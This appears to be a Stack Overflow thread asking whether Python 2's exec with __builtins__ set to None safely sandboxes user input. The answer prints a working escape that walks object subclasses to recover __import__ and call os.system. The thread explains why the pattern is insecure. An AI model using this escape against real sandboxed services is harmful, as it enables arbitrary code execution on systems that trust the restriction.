# Is an `exec("string", {'__builtins__': None})` a secure way to execute user input? If not, how can it be maliciously leveraged

Tags: python, python-2.7

If this is being executed and I have full control over the string's value, am I able to leverage a reverse shell or am I able to read files.

`exec("string", {'__builtins__': None})`

I'm having issues with finding relevant documentation about what is not included `__builtins__`. I've manually found that `print('something')` works.

I, myself, lack the knowledge to determine whether this is exploitable or not. I feel like something like this shouldn't be safe since, correct me if I'm wrong, all builtins are python functions (Not confident on this).

I thought it might also be relevant referencing that a global variable was given as the 3rd argument. i.e: `exec("string", {'__builtins__': None}, global_var)`

Note: This is for python2.
Note: This is for a challenge. No grey/black hat stuff!

Comment: I think it depends a bit on what you mean by exploitable -- but the answer is probably "yes -- on some level this is unsafe".  See https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html where it is demonstrated that a malicious user could effectively segfault your interpreter under these circumstances.

Comment: Moreover, that's a segfault because the bytecode being run is `KABOOM`, but if someone can run any arbitrary bytecode they want, that's a lot of attack surface to use to find an arbitrary code execution mechanism. Just because an exploit isn't known yet doesn't mean it's wise to expose the surface.

Answer (score 1):

This is not a safe practice. Code exec can happen in the following manner:

This example executes some shellcode by importing os. The following can be altered to gain access to all builtins.

```py
s = "[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('shellcode')"
exec(s, {'builtins': None})
```

The articles mentioned in the comments on the main question provide all the resources I used to get to this conclusion. Thanks guys!

Comment: if i dont allow `_` , \ , `dir` will this be safe

Comment: @Santhosh, not necessarily.